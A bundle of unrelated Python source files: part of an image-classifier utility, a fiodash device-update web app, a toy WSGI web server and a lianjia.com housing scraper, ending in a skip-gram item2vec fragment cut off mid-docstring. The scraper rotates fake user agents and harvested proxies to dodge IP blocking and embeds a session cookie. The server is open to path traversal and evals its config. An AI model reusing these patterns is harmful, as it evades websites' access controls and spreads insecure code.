- Stored command line arguments as an Argument Parser Object with parse_args() data structure
'''
parser = argparse.ArgumentParser(description = 'Classify input images and benchmark performance')
parser.add_argument('--dir', type=str, default= 'Flower_data', help='input path for data directory')
parser.add_argument('--load', type=str, default='n', help='yes \'y\' or no \'n\' to load state_dict for model', choices=['y','n'])
parser.add_argument('--train', type=str, default='n', help='yes \'y\' or no \'n\' to retrain this model', choices=['y','n'])
parser.add_argument('--epoch', type=int, default=50, help='provide the number of epochs for training (default 100)')
parser.add_argument('--layer', type=int, default=2, help='provide the number of hidden layers to use (default 2)')
parser.add_argument('--learn', type=int, default=0.003, help='provide the learning rate to begin training (default 0.003)')
parser.add_argument('--model', type=str, default='googlenet', help='select pretrained model',
choices=['vgg', 'alexnet', 'googlenet', 'densenet', 'resnext', 'shufflenet'])
return parser.parse_args()
def u2_load_processed_data(data_dir):
'''
Purpose:
- Access data directory and produce a dictionary of datasets
- Create a dictionary of the class labels and read in the data labels
Parameters:
- data_dir = pathway to the data
Returns:
- dictionary of datasets
- dictionary of data labels
- dictionary of class labels
'''
# Initialize empty dictionaries to hold data and data labels
dict_datasets = {}
dict_data_labels = {}
# Iterate through folders in the data directory
for folder in os.listdir(data_dir):
# If data exists, create datasets for overfitting, testing, training, and validating data
if folder in ['overfit', 'test', 'train', 'valid']:
dict_datasets[folder + '_data'] = datasets.ImageFolder(data_dir + folder, transform=u3_process_data(folder))
# If data for inference exists, create a dataset from the predict folder
if folder == 'predict':
predict_transform = u3_process_data(folder)
dict_datasets['predict_data'] = [(predict_transform(Image.open(data_dir + folder + '/' + filename)),
filename) for filename in os.listdir(data_dir + folder)]
# If a data names are added to the data directory as a json, open it and read into data label dictionary
if os.path.splitext(folder)[1] == '.json':
with open(data_dir + folder, 'r') as f:
dict_data_labels = json.load(f)
# Create a dictionary connecting class indexes to class labels, return the datasets and label dictionaries
dict_class_labels = {value : key for (key, value) in dict_datasets['train_data'].class_to_idx.items()}
return dict_datasets, dict_data_labels, dict_class_labels
def u3_process_data(transform_request):
'''
Purpose:
- Define an assortment of transforms for application to specific datasets
- Return the appropriate transformation that corresponds to the inputted request
- Defined transforms are composed of a sequence of individual transform operations
- Depending on the needs of each data set, a transform will use specific operations
Parameters:
- transformation_request = selected transformation type
Returns:
- transform that corresponds to the request
'''
image_1d_size = 224
predict_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
inverse_transform = transforms.Compose([transforms.Normalize([0, 0, 0], [1/0.229, 1/0.224, 1/0.225]),
transforms.Normalize([-0.485, -0.456, -0.406], [1, 1, 1])])
train_transform = transforms.Compose([transforms.RandomRotation(20),
transforms.RandomResizedCrop(image_1d_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
valid_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
test_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
game_transform = transforms.Compose([transforms.Resize(int(np.round_(image_1d_size*1.1, decimals=0))),
transforms.CenterCrop(image_1d_size),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
overfit_transform = train_transform
return locals()[transform_request + '_transform']
def u4_data_iterator(dict_datasets):
'''
Purpose:
- Receive a dictionary of datasets
- Convert each dataset to a dataLoader
- Return a dictionary of dataloaders
Parameters:
- dict_datasets = dictionary of datasets
Returns:
- dict_data_loaders = dictionary of dataloaders
'''
dict_data_loaders = {}
for dataset in dict_datasets:
loader_type = dataset.split('_')[0] + '_loader'
dict_data_loaders[loader_type] = torch.utils.data.DataLoader(dict_datasets[dataset], batch_size=128, shuffle=True)
return dict_data_loaders
def u5_time_limited_input(prompt, default=True):
'''
Purpose:
- Receive text and start a thread to initiate a user input prompt with that text
- Track thread time and limit time to an established TIMEOUT limit
- Return user input or after the TIMEOUT limit is reached return the default choice
Parameters:
- prompt = specific question text for display
- default = default choice if no user input is provided
Returns:
- choice = the user input or the default
'''
TIMEOUT = 10
prompt = prompt + f': \'y\' for yes, \'n\' for no ({TIMEOUT} seconds to choose): '
user_input_thread = Thread(target=u6_user_input_prompt, args=(prompt, default), daemon = True)
user_input_thread.start() # Start the thread, calling the user input function
user_input_thread.join(TIMEOUT) # Limit the thread to the TIMEOUT time limit
if not answered:
print('\n No valid input, proceeding with operation...\n')
return choice
def u6_user_input_prompt(prompt, default):
'''
Purpose:
- Receive a prompt and use it for user input prompting
- Once answered return True or False if input is yes or no
- Ask question again if the input is incorrect
Parameters:
- prompt = complete user input question text for display
- default = default choice if no user input is provided
Returns:
- choice = the user input or the default
'''
global choice, answered # Global variables are required to communicate input statuses back to the thread manager
choice = default
answered = False
while not answered:
choice = input(prompt)
if choice == 'Y' or choice == 'y':
print('User input = Yes\n')
choice = True
answered = True
elif choice == 'N' or choice == 'n':
choice = False
answered = True
print('User input = No\n')
else:
choice=choice
print('Error, please use the character inputs \'Y\' and \'N\'')
|
main.py
|
from argparse import ArgumentParser
import logging
import os
import sys
from threading import Thread
from time import sleep
from bottle import error, redirect, request, response, route, run, template
from requests import HTTPError
from fiodash.aklite import AkliteClient
from fiodash.templates import INDEX_TPL
logging.basicConfig(level="INFO", format="%(asctime)s %(levelname)s: %(message)s")
log = logging.getLogger()
logging.getLogger("requests").setLevel(logging.WARNING)
client = AkliteClient()
SINGLE_APP = os.environ.get("FIODASH_SINGLE_APP")
@error(500)
def error500(error):
if isinstance(error.exception, HTTPError):
r = error.exception.response
return f"HTTP_{r.status_code}: {r.text}"
return str(error.exception)
@route("/")
def index():
uuid, name = client.get_uuid_and_name()
current = client.get_current()
latest = client.targets()[-1]
update_available = None
client.refresh_config()
configured_apps = client.configured_apps
apps = []
for app in current.apps:
apps.append({"name": app, "enabled": app in configured_apps})
return template(
INDEX_TPL,
name=name,
uuid=uuid,
current_target=current,
latest=latest,
apps=apps,
single_app=SINGLE_APP,
)
@route("/update-apps", method="POST")
def update_apps():
apps = []
request_apps = request.json["apps"]
for app in client.get_current().apps:
if app in request_apps:
apps.append(app)
if set(apps) != set(client.configured_apps):
log.info("Enabling apps: %s", apps)
client.set_apps(apps)
redirect("/")
@route("/update-target", method="POST")
def update_target():
current = client.get_current()
latest = client.targets()[-1]
log.info("Latest target is %s", latest)
if current.name != latest.name:
log.info("Downloading target")
correlation_id = latest.generate_correlation_id()
reason = f"Upgrading from {current.name} to {latest.name}"
client.download(latest.name, correlation_id, reason)
log.info("Installing target")
if client.install(latest.name, correlation_id):
response.status = 202
def sleep_reboot():
sleep(2)
client.reboot()
Thread(target=sleep_reboot).start()
return ""
def webapp(args):
run(host=args.host, port=args.port, debug=args.debug, reloader=args.debug)
def list_targets(args):
for t in client.targets():
print("# Target version", t.version)
print("\tname: ", t.name)
print("\tostree sha:", t.sha256)
print("\tapps:")
for name, app in t.apps.items():
print("\t\t", name, "\t", app.uri)
print()
def install_target(args):
current = client.get_current()
targets = client.targets()
tgt = targets[-1]
if args.target_version:
for t in targets:
if t.version == args.target_version:
tgt = t
break
else:
sys.exit("Target version not found")
log.info("Downloading %s", tgt.name)
correlation_id = tgt.generate_correlation_id()
reason = f"Upgrading from {current.name} to {tgt.name}"
client.download(tgt.name, correlation_id, reason)
log.info("Installing %s", tgt)
if client.install(tgt.name, correlation_id):
client.reboot()
def set_apps(args):
client.set_apps(args.app)
def status(args):
uuid, name = client.get_uuid_and_name()
print("# Device UUID:", uuid)
print("# Device Name:", name)
t = client.get_current()
configured_apps = client.configured_apps
print("# Target version", t.version)
print("\tname: ", t.name)
print("\tostree sha:", t.sha256)
print("\tapps: (* = running)")
for name, app in t.apps.items():
val = "*" if name in configured_apps else " "
print("\t\t", val, name, "\t", app.uri)
def _get_parser():
parser = ArgumentParser(description="fiodash web app")
sub = parser.add_subparsers(help="sub-command help")
p = sub.add_parser("serve", help="Run as a web app")
p.set_defaults(func=webapp)
p.add_argument(
"--host", default="0.0.0.0", help="Host to bind to. Default=%(default)s",
)
p.add_argument(
"--port", type=int, default=8080, help="Port to bind to. Default=%(default)s",
)
p.add_argument(
"--debug", action="store_true", help="Run in debug mode",
)
p = sub.add_parser("list", help="List available targets")
p.set_defaults(func=list_targets)
p = sub.add_parser("set-apps", help="Set apps to run on target")
p.set_defaults(func=set_apps)
p.add_argument("app", nargs="*")
p = sub.add_parser("install", help="Install target")
p.set_defaults(func=install_target)
p.add_argument(
"--target-version",
"-t",
type=int,
help="Target version. Default is latest Target",
)
p = sub.add_parser("status", help="Show current status")
p.set_defaults(func=status)
return parser
def main():
parser = _get_parser()
args = parser.parse_args()
client.refresh_config()
client.send_telemetry()
args = parser.parse_args()
if getattr(args, "func", None):
args.func(args)
else:
parser.print_help(sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
|
web_server.py
|
import socket
import re
import multiprocessing
import time
# import dynamic.mini_frame
import sys
class WSGIServer(object):
def __init__(self, port, app, static_path):
# 1. 创建套接字
self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2. 绑定
self.tcp_server_socket.bind(("", port))
# 3. 变为监听套接字
self.tcp_server_socket.listen(128)
self.application = app
self.static_path = static_path
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1. 接收浏览器发送过来的请求 ,即http请求
# GET / HTTP/1.1
# .....
request = new_socket.recv(1024).decode("utf-8")
# print(">>>"*50)
# print(request)
request_lines = request.splitlines()
print("")
print(">"*20)
print(request_lines)
# GET /index.html HTTP/1.1
# get post put del
file_name = ""
ret = re.match(r"[^/]+(/[^ ]*)", request_lines[0])
if ret:
file_name = ret.group(1)
# print("*"*50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2. 返回http格式的数据,给浏览器
# 2.1 如果请求的资源不是以.html结尾,那么就认为是静态资源(css/js/png,jpg等)
if not file_name.endswith(".html"):
try:
f = open(self.static_path + file_name, "rb")
except:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "------file not found-----"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 准备发送给浏览器的数据---header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 准备发送给浏览器的数据---boy
# response += "hahahhah"
# 将response header发送给浏览器
new_socket.send(response.encode("utf-8"))
# 将response ic.mini_frame.applicationbody发送给浏览器
new_socket.send(html_content)
else:
# 2.2 如果是以.html结尾,那么就认为是动态资源的请求
env = dict() # 这个字典中存放的是web服务器要传递给 web框架的数据信息
env['PATH_INFO'] = file_name
# {"PATH_INFO": "/index.py"}
# body = dynamic.mini_frame.application(env, self.set_response_header)
body = self.application(env, self.set_response_header)
header = "HTTP/1.1 %s\r\n" % self.status
for temp in self.headers:
header += "%s:%s\r\n" % (temp[0], temp[1])
header += "\r\n"
response = header+body
# 发送response给浏览器
new_socket.send(response.encode("utf-8"))
# 关闭套接
new_socket.close()
def set_response_header(self, status, headers):
self.status = status
self.headers = [("server", "mini_web v8.8")]
self.headers += headers
def run_forever(self):
"""用来完成整体的控制"""
while True:
# 4. 等待新客户端的链接
new_socket, client_addr = self.tcp_server_socket.accept()
# 5. 为这个客户端服务
p = multiprocessing.Process(target=self.service_client, args=(new_socket,))
p.start()
new_socket.close()
# 关闭监听套接字
self.tcp_server_socket.close()
def main():
"""控制整体,创建一个web 服务器对象,然后调用这个对象的run_forever方法运行"""
if len(sys.argv) == 3:
try:
port = int(sys.argv[1]) # 7890
frame_app_name = sys.argv[2] # mini_frame:application
except Exception as ret:
print("端口输入错误。。。。。")
return
else:
print("请按照以下方式运行:")
print("python3 xxxx.py 7890 mini_frame:application")
return
# mini_frame:application
ret = re.match(r"([^:]+):(.*)", frame_app_name)
if ret:
frame_name = ret.group(1) # mini_frame
app_name = ret.group(2) # application
else:
print("请按照以下方式运行:")
print("python3 xxxx.py 7890 mini_frame:application")
return
with open("./web_server.conf") as f:
conf_info = eval(f.read())
# 此时conf_info是字典,里面的数据为
# {
# "static_path":"./static",
# "dynamic_path":"./dynamic"
# }
sys.path.append(conf_info["dynamic_path"])
# import frame_name --->找frame_name.py
frame = __import__(frame_name) # 返回值标记这 导入的这个模板
app = getattr(frame, app_name) # 此时app就指向了 dynamic/mini_frame模块中的application这个函数
# print(app)
wsgi_server = WSGIServer(port, app, conf_info['static_path'])
wsgi_server.run_forever()
if __name__ == "__main__":
main()
|
misc.py
|
import requests
import random
from datetime import datetime
from bs4 import BeautifulSoup
import threading
from six.moves import urllib
import socket
hds = [{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'},
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'},
{'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/44.0.2403.89 Chrome/44.0.2403.89 Safari/537.36'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'},
{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'},
{'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'},
{'User-Agent': 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11'},
{'User-Agent': 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11'}]
hd = {
'Host': 'bj.lianjia.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer': 'http://captcha.lianjia.com/?redirect=http%3A%2F%2Fbj.lianjia.com%2Fxiaoqu%2Fxicheng%2F',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'lianjia_uuid=31746070-1dfd-441b-9dac-a762d90294a5; UM_distinctid=15b12d80b45179-0d64c7a3f6681e-1d396853-1fa400-15b12d80b46247; introduce=1; all-lj=c28812af28ef34a41ba2474a2b5c52c2; select_city=110000; _jzqx=1.1490669800.1491529315.3.jzqsr=captcha%2Elianjia%2Ecom|jzqct=/.jzqsr=captcha%2Elianjia%2Ecom|jzqct=/; _jzqckmp=1; CNZZDATA1253477573=1526314437-1490666871-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491525581; _smt_uid=58d9d0e8.bf2821b; CNZZDATA1254525948=497550824-1490668493-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491527170; CNZZDATA1255633284=1227338008-1490665030-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491529075; CNZZDATA1255604082=1285546817-1490665213-http%253A%252F%252Fcaptcha.lianjia.com%252F%7C1491529283; _qzja=1.866324558.1490669800393.1490941575494.1491529315136.1491529677322.1491530677583.0.0.0.54.10; _qzjb=1.1491529315136.4.0.0.0; _qzjc=1; _qzjto=4.1.0; _jzqa=1.1305601964964521000.1490669800.1490941575.1491529315.10; _jzqc=1; _jzqb=1.4.10.1491529315.1; _gat=1; _gat_past=1; _gat_global=1; _gat_new_global=1; _ga=GA1.2.48956529.1490669802; _gat_dianpu_agent=1; lianjia_ssid=6fa2fc72-0887-4093-aab6-2345792b86d3'
}
def get_source_code(url):
try:
result = requests.get(
url, headers=hds[random.randint(0, len(hds) - 1)])
#result = requests.get(url)
source_code = result.content
except Exception as e:
print(e)
return
return source_code
def get_total_pages(url):
source_code = get_source_code(url)
soup = BeautifulSoup(source_code, 'lxml')
total_pages = 0
try:
page_info = soup.find('div', {'class': 'page-box house-lst-page-box'})
except AttributeError as e:
page_info = None
# if it doesnot get total page, then return default value 50
if page_info == None:
return 50
# '{"totalPage":5,"curPage":1}'
page_info_str = page_info.get('page-data').split(',')[0]
total_pages = int(page_info_str.split(':')[1])
return total_pages
def get_sh_total_pages(url):
source_code = get_source_code(url)
soup = BeautifulSoup(source_code, 'lxml')
total_pages = 0
try:
page_info = soup.find('a', {'gahref': 'results_totalpage'})
except AttributeError as e:
page_info = None
if page_info == None:
return 1
# <a href="/xiaoqu/putuo/d58" gahref="results_totalpage">58</a>
total_pages = int(page_info.get_text().strip(''))
return total_pages
#===========proxy ip spider, we do not use now because it is not stable===
proxys_src = []
proxys = []
def spider_proxyip():
try:
for i in range(1, 4):
url = 'http://www.xicidaili.com/nt/' + str(i)
req = requests.get(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_code = req.content
soup = BeautifulSoup(source_code, 'lxml')
ips = soup.findAll('tr')
for x in range(1, len(ips)):
ip = ips[x]
tds = ip.findAll("td")
proxy_host = "http://" + \
tds[1].contents[0] + ":" + tds[2].contents[0]
proxy_temp = {"http": proxy_host}
proxys_src.append(proxy_temp)
except Exception as e:
print("spider_proxyip exception:")
print(e)
def test_proxyip_thread(i):
socket.setdefaulttimeout(5)
url = "http://bj.lianjia.com"
try:
proxy_support = urllib.request.ProxyHandler(proxys_src[i])
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
res = urllib.request.Request(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_cod = urllib.request.urlopen(res, timeout=10).read()
if source_cod.find(b'\xe6\x82\xa8\xe6\x89\x80\xe5\x9c\xa8\xe7\x9a\x84IP') == -1:
proxys.append(proxys_src[i])
except Exception as e:
return
# print(e)
def test_proxyip():
print("proxys before:" + str(len(proxys_src)))
threads = []
try:
for i in range(len(proxys_src)):
thread = threading.Thread(target=test_proxyip_thread, args=[i])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
except Exception as e:
print(e)
print("proxys after:" + str(len(proxys)))
def prepare_proxy():
spider_proxyip()
test_proxyip()
def readurl_by_proxy(url):
try:
tet = proxys[random.randint(0, len(proxys) - 1)]
proxy_support = urllib.request.ProxyHandler(tet)
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
req = urllib.request.Request(
url, headers=hds[random.randint(0, len(hds) - 1)])
source_code = urllib.request.urlopen(req, timeout=10).read()
if source_code.find(b'\xe6\x82\xa8\xe6\x89\x80\xe5\x9c\xa8\xe7\x9a\x84IP') != -1:
proxys.remove(tet)
print('proxys remove by IP traffic, new length is:' + str(len(proxys)))
return None
except Exception as e:
proxys.remove(tet)
print('proxys remove by exception:')
print(e)
print('proxys new length is:' + str(len(proxys)))
return None
return source_code
|
skipgram_item2vec.py
|
#!/usr/bin/env python3
# coding: utf-8
# File: (app)item2vector.py
# Author: maozida880
# Date: 21-01-18
import collections
import math
import random
import numpy as np
import tensorflow as tf
import common_io
import random
import queue
import time
import threading
tf.app.flags.DEFINE_string("tables", "初处理输入表,训练输入表 ", "初处理输入表:是一个用户的item index列表, [1 2 3 4 5];训练输入表:是初处理表变为pair对的表")
tf.app.flags.DEFINE_string("outputs", "初处理输出表", "初处理输出表就是训练输入表")
tf.app.flags.DEFINE_string("checkpointDir", "模型保存地址", "output info")
tf.app.flags.DEFINE_string("pairname", "训练输入表", "用于训练的输入表")
tf.app.flags.DEFINE_string("modelpath",'模型保存地址', "model,与checkpointDir一样,通道不同而已")
tf.app.flags.DEFINE_integer("lowfrequency", 100, "lowfrequency limit")
FLAGS = tf.app.flags.FLAGS
class SkipGram:
def __init__(self):
self.data_index = 0
self.tables = FLAGS.tables
self.output = FLAGS.outputs
# self.modelpath = FLAGS.checkpointDir
# input config
self.__input_init__()
self.min_count = FLAGS.lowfrequency # 最低词频,保留模型中的词表 lee这个要都保留
self.batch_size = 2000 # 每次迭代训练选取的样本数目
self.embedding_size = 128 # 生成词向量的维度
self.window_size = 5 # 考虑前后几个词,窗口大小, skipgram中的中心词-上下文pairs数目就是windowsize *2
self.num_sampled = 300 # 负样本采样.
self.num_steps = 200000 # 定义最大迭代次数,创建并设置默认的session,开始实际训练
self.vocabulary_size = 1000000
# self.words = self.read_data(self.dataset) # lee 词的表达都用整体表示
self.scheme = "all" # all, window两种
self.pair_name = FLAGS.pairname
# make pair
self.__pair_init__()
#read data
# self.pair_list = self.readfile2list()
# self.length_pair_list = len(self.pair_list)
self.pair_list = []
self.queue_preline = queue.Queue(maxsize=1)
self.queue_readingstate = queue.Queue(maxsize=1)
def __input_init__(self):
tables_list = self.tables.split(",")
self.input_table = tables_list[0]
self.pair_table = tables_list[1]
self.output_table = self.output
self.modelpath = FLAGS.checkpointDir.split(",")[1]
self.output_path = FLAGS.checkpointDir.split(",")[0]
self.pair_file = self.output
self.dataset = self.input_fn() # lee 以句子为表示的列表
def __pair_init__(self):
#make data
print("2. build dataset")
# self.data, _, _, _ = self.build_dataset(self.words, self.min_count)
self.data = self.dataset
print("dataset is {}".format(self.dataset[0]))
print( "words count is {}".format(len(self.dataset)) )
self.pair_list = self.centerword_label_pair_generate(self.window_size,self.data,self.scheme)
#define the input
def input_fn(self):
print("1. reading data and make dictionary")
dataset = []
with common_io.table.TableReader(self.input_table) as f1:
cnt = f1.get_row_count()
cnt = 4800000
print("all need to read %d lines"%cnt)
for i in range(cnt):
line = f1.read(1)
index_list = line[0][1].split(",")
dataset.append(index_list)
if i % 500000 == 0: print("reading: %d"%i)
return dataset
# 定义读取数据的函数,并把数据转成列表
def read_data(self, dataset):
print("将句子列表融合成大列表")
words = []
for data in dataset:
words.extend(data)
return words
#创建数据集
def build_dataset(self, words, min_count):
# 创建词汇表,过滤低频次词语,这里使用的人是mincount>=5,其余单词认定为Unknown,编号为0,
# 这一步在gensim提供的wordvector中,采用的是minicount的方法
#对原words列表中的单词使用字典中的ID进行编号,即将单词转换成整数,储存在data列表中,同时对UNK进行计数
count = [['UNK', -1]] #频率词表
count.extend([item for item in collections.Counter(words).most_common() if item[1] >= min_count])
dictionary = dict() # 序号词表 {word:index}
for word, _ in count:
dictionary[word] = len(dictionary)
data = list() #lee 词的编号
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0
unk_count += 1
# data.append(index)
count[0][1] = unk_count
# 将dictionary中的数据反转,即可以通过ID找到对应的单词,保存在reversed_dictionary中
reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
#lee 构建句子的词
for sentence in self.dataset:
sentence_index_list = []
for word in list(set(sentence)):
if word in dictionary.keys():
index = dictionary[word]
else:
index = 0
sentence_index_list.append(index)
data.append(sentence_index_list)
return data, count, dictionary, reverse_dictionary
#这个模块是产生 pair list的,产生[(centre,label)]
def centerword_label_pair_generate(self,window_size,data,scheme = "all"):
#问题,要不要让一个句子的中心词每次只产生10个(input/label)对,分成sentence_word_num//10组,将组的顺序打乱?
# pair_list = [] # (input, label) lee 把所有的标签都放进来,这个数量是sentence_word_num^2 * sentence_num (10^2)^2*10^4
# lee 格式是[[(pair1),(pair2),...(pairN)]sentence1, []sentence2,...,[]sentenceN]
print("2.1 center word label pair generate")
lasttime = time.time()
tmp_list = []
# with tf.gfile.GFile(self.output_path + self.pair_name, 'w') as fw:
with common_io.table.TableWriter(self.output_table) as fw:
print("2.2 all data count is %d"%len(data))
for num,sentence in enumerate(data):
random.shuffle(sentence) #乱序
sentence_pair_list = []
sentence_len = len(sentence)
for i in range(sentence_len):
center_word = sentence[i]
count = 0
for j in range(sentence_len):
random_sampling = random.randint(0, sentence_len-1)
if random_sampling != i:
label_word = sentence[random_sampling]
sentence_pair_list.append((center_word,label_word))
if count>20:break;
count+=1
if scheme == "all":
#方案1: 是中心词全量连续窗口方案
# pair_list.extend(sentence_pair_list)
pass
elif scheme == "window":
#方案2: 顺序打乱方案: 句子内以窗口大小的2倍为单位,进行乱序排位计算
label_num = 2*window_size # 一个前后窗口的标签数目
if sentence_len<label_num+1:continue; #如果窗口不够用,不算了
sentence_pair_num = len(sentence_pair_list) #pair数量
sentence_group_num = sentence_pair_num//label_num #组数量
last_num = sentence_pair_num%label_num #余数
#共分为 sentence_group_num+1 组
sentence_pair_list_by_group = [sentence_pair_list[num*label_num:(num+1)*label_num] for num in range(sentence_group_num)]
sentence_pair_list_by_group.append(sentence_pair_list[-1-last_num:-1])
random.shuffle(sentence_pair_list_by_group)
sentence_pair_list_shuffle = []
for ss in sentence_pair_list_by_group:
sentence_pair_list_shuffle.extend(ss)
sentence_pair_list = sentence_pair_list_shuffle
#pair_list.extend(sentence_pair_list_shuffle)
else:
print("input error!")
break
if len(sentence_pair_list):
for pair in sentence_pair_list:
# tmp_list.append((str(pair[0])+","+str(pair[1])))
tmp_list.append( str(pair[0])+","+str(pair[1]) )
if num % 30000 == 0:
start = lasttime
middletime = time.time()
if num %100 == 0:
if num>1:
# fw.write("\n".join(tmp_list)+"\n")
ready_to_write_list = ["|".join(tmp_list)]
fw.write( ready_to_write_list,range(1) )
tmp_list = []
if num%30000 == 0:
lasttime = time.time()
print("line num is {}, every 30000 imei use time is {}, write 30000 time is {}, process time is {}".format(
num,lasttime-start,lasttime-middletime, middletime-start))
# return pair_list
def readfile2list(self):
print("3. reading data and make dictionary")
dataset = []
with common_io.table.TableReader(self.pair_table) as f1:
cnt = f1.get_row_count()
print("all need to read %d lines"%cnt)
for i in range(cnt):
line = f1.read(1)
center_word = line[0][0]
label_word = line[0][1]
dataset.append((center_word, label_word))
if i % 500000 == 0: print("reading: %d"%i)
return dataset
def linepara(self, line):
data_list = []
line_pair_list = line[0][0].split("|")
for pair in line_pair_list:
pair_list = pair.split(",")
pair_tuple = (pair_list[0], pair_list[1])
data_list.append(pair_tuple)
return data_list
def lineproduce(self):
# 提供数据的线程
# 1. 解析表;2. 满足batch需求; 3. 提供线程服务 4. 生产者,通过self.queue_readingstate传状态停止
queue_preline = self.queue_preline
queue_readingstate = self.queue_readingstate
reader = common_io.table.TableReader(
self.pair_table
)
total_records_num = reader.get_row_count()
print("start to read odps table and need read %d lines"%total_records_num)
count = 0
for _ in range(total_records_num):
data=reader.read(1)
data_list = self.linepara(data)
queue_preline.put(data_list) # 生产者装置数据
print("=========produce %d line======="%count)
count += 1
StateFlag = queue_readingstate.get() # 获取状态
if StateFlag: #传状态,控制停止
# 存储
print("embedding size is %d" % (len(self.final_embeddings)))
print("writing embedding")
final_embeddings = self.final_embeddings
print(final_embeddings[0])
print("save model path is %s" % (self.modelpath + "model"))
fw = tf.gfile.GFile(self.modelpath + "model", 'w')
for index, item in enumerate(final_embeddings):
if index % 50000 == 0:
print("save dictionary %d lines" % index)
# fw.write(reverse_dictionary[index] + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.write(str(index) + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.close()
print("可能还有语料,但是Step已经到了上限")
break
def __readdata(self):
# 什么时候取队列中的数据:在batch将num消耗掉
self.data_index = 0
queue_preline = self.queue_preline
self.pair_list = queue_preline.get()
self.length_pair_list = len(self.pair_list)
print("consumer get queue data, line number is %d"%(len(self.pair_list)))
#生成训练样本,assert断言:申明其布尔值必须为真的判定,如果发生异常,就表示为假
def generate_batch(self, batch_size, window_size):
# 该函数根据训练样本中词的顺序抽取形成训练集
# 这个函数的功能是对数据data中的每个单词,分别与前一个单词和后一个单词生成一个batch,
# 即[data[1],data[0]]和[data[1],data[2]],其中当前单词data[1]存在batch中,前后单词存在labels中
# batch_size:每个批次训练多少样本
# num_skips: 为每个单词生成多少样本(本次实验是2个),batch_size必须是num_skips的整数倍,这样可以确保由一个目标词汇生成的样本在同一个批次中。
# window_size:单词最远可以联系的距离(本次实验设为1,即目标单词只能和相邻的两个单词生成样本),2*window_size>=num_skips
'''
eg:
input_batch, labels = generate_batch(batch_size = 8, num_skips = 2, window_size = 1)
#Sample data [0, 5241, 3082, 12, 6, 195, 2, 3137, 46, 59] ['UNK', 'anarchism', 'originated', 'as', 'a', 'term', 'of', 'abuse', 'first', 'used']
#假设取num_steps为2, window_size为1, batchsize为8
#input_batch:[5242, 3084, 12, 6]
#labels[0, 3082, 5241, 12, 3082, 6, 12, 195]
print(input_batch) [5242 5242 3084 3084 12 12 6 6],共8维
print(labels) [[ 0] [3082] [ 12] [5242] [ 6] [3082] [ 12] [ 195]],共8维
'''
